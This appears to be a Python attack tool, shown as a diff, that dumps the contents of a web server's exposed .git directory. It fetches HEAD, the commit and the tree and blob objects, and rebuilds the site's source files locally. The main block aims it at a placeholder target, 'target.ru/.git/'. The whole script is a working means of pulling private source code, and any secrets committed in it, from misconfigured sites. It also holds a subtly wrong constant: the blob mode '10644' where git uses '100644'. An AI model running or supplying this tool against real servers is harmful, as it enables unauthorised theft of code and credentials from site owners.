| 1 | + | import binascii |
| 2 | + | import os |
| 3 | + | import time |
| 4 | + | import zlib |
| 5 | + | from collections import namedtuple |
| 6 | + | from typing import List, Tuple |
| 7 | + | from requests import Session |
| 8 | + | |
| 9 | + | session = Session() |
| 10 | + | ObjTypes = namedtuple("ObjTypes", ("TREE", "BLOB")) |
| 11 | + | object_types = ObjTypes("40000", "10644") |
| 12 | + | |
| 13 | + | |
| 14 | + | class RemoteGitObject: |
| 15 | + | type_: str |
| 16 | + | content: bytes |
| 17 | + | |
| 18 | + | def __init__(self, url, obj_type=None): |
| 19 | + | self.url = url |
| 20 | + | self.type_ = obj_type |
| 21 | + | self.data_ = session.get(url).content |
| 22 | + | self.content = zlib.decompress(self.data_) |
| 23 | + | self.content = self.content.split(b'\x00', maxsplit=1)[1] |
| 24 | + | |
| 25 | + | def save(self, local_path: str): |
| 26 | + | mode = "w" |
| 27 | + | content = self.content |
| 28 | + | try: |
| 29 | + | content = self.content.decode() |
| 30 | + | except UnicodeDecodeError: |
| 31 | + | mode = "wb" |
| 32 | + | with open(local_path, mode) as file: |
| 33 | + | file.write(content) |
| 34 | + | |
| 35 | + | |
| 36 | + | class RemoteGitTree(RemoteGitObject): |
| 37 | + | objects: List[Tuple] |
| 38 | + | |
| 39 | + | def __init__(self, url: str, obj_type=object_types.TREE): |
| 40 | + | super().__init__(url, obj_type) |
| 41 | + | self.objects = self._get_objects() |
| 42 | + | |
| 43 | + | def _get_objects(self) -> List[Tuple]: |
| 44 | + | objects = [] |
| 45 | + | objects_content = self.content |
| 46 | + | while objects_content: |
| 47 | + | obj_type, objects_content = objects_content.split(maxsplit=1) |
| 48 | + | obj_name, objects_content = objects_content.split(b'\x00', maxsplit=1) |
| 49 | + | obj_hash, objects_content = binascii.hexlify(objects_content[:20]), objects_content[20:] |
| 50 | + | objects.append((obj_type.decode(), obj_hash.decode(), obj_name.decode())) |
| 51 | + | return objects |
| 52 | + | |
| 53 | + | def save(self, local_path: str): |
| 54 | + | os.mkdir(local_path) |
| 55 | + | |
| 56 | + | |
| 57 | + | class RemoteGitDirectoryCrawler: |
| 58 | + | url: str |
| 59 | + | current_tree: RemoteGitTree |
| 60 | + | |
| 61 | + | def __init__(self, url: str): |
| 62 | + | self.url = url[:-1] if url.endswith('/') else url |
| 63 | + | self.current_tree = self._get_current_tree() |
| 64 | + | |
| 65 | + | def _get_base_url(self, path: str) -> str: |
| 66 | + | return f"{self.url}/{path[1:] if path.startswith('/') else path}" |
| 67 | + | |
| 68 | + | def _get_current_branch_url(self) -> str: |
| 69 | + | resp_txt = session.get(self._get_base_url("HEAD")).text |
| 70 | + | return self._get_base_url(resp_txt.split()[1]) |
| 71 | + | |
| 72 | + | def _get_object_url(self, obj_hash: str) -> str: |
| 73 | + | path = f"objects/{obj_hash[:2]}/{obj_hash[2:]}" |
| 74 | + | return self._get_base_url(path) |
| 75 | + | |
| 76 | + | def _get_current_tree(self) -> RemoteGitTree: |
| 77 | + | current_branch_url = self._get_current_branch_url() |
| 78 | + | |
| 79 | + | commit_hash = session.get(current_branch_url).text.strip() |
| 80 | + | commit_obj = RemoteGitObject(self._get_object_url(commit_hash)) |
| 81 | + | commit_entries = commit_obj.content.decode("utf-8").split('\n') |
| 82 | + | |
| 83 | + | tree_info = commit_entries[0] |
| 84 | + | tree_hash = tree_info.split()[-1] |
| 85 | + | return RemoteGitTree(self._get_object_url(tree_hash)) |
| 86 | + | |
| 87 | + | def _crawl_wrapper(self, save_to: str, tree: RemoteGitTree, level=0, exclude: List[str] = None): |
| 88 | + | time.sleep(1) |
| 89 | + | for type_, hash_, name in tree.objects: |
| 90 | + | save_pt = os.path.join(save_to, name) |
| 91 | + | |
| 92 | + | if len(ext := name.split('.')) == 2: |
| 93 | + | ext = ext[-1] |
| 94 | + | if ext in exclude: |
| 95 | + | print(f"{' ' * level} excluding: {save_pt}") |
| 96 | + | continue |
| 97 | + | |
| 98 | + | object_url = self._get_object_url(hash_) |
| 99 | + | if type_ == object_types.TREE: |
| 100 | + | try: |
| 101 | + | tree.save(save_pt) |
| 102 | + | except FileExistsError: |
| 103 | + | pass |
| 104 | + | next_tree = RemoteGitTree(object_url) |
| 105 | + | |
| 106 | + | for save_pt, level in self._crawl_wrapper(save_pt, next_tree, level + 1, exclude): |
| 107 | + | yield save_pt, level |
| 108 | + | continue |
| 109 | + | if os.path.exists(save_pt): |
| 110 | + | continue |
| 111 | + | git_object = RemoteGitObject(object_url, obj_type=type_) |
| 112 | + | yield save_pt, level |
| 113 | + | git_object.save(save_pt) |
| 114 | + | |
| 115 | + | time.sleep(0.3) |
| 116 | + | |
| 117 | + | def crawl(self, save_to: str, exclude: List[str] = None): |
| 118 | + | for save_pt, level in self._crawl_wrapper(save_to, self.current_tree, exclude=exclude): |
| 119 | + | yield save_pt, level |
| 120 | + | |
| 121 | + | |
| 122 | + | if __name__ == "__main__": |
| 123 | + | target_git_url = "https://target.ru/.git/" |
| 124 | + | crawler = RemoteGitDirectoryCrawler(target_git_url) |
| 125 | + | for saved_object_pt, dir_level in crawler.crawl(save_to="./target/filesystem/", |
| 126 | + | exclude=["jpg", "png", "jpeg", "gif", "ico"]): |
| 127 | + | print(f"{' ' * dir_level}saving: {saved_object_pt}") |
| 128 | + | print("Done") |
| 129 | + | |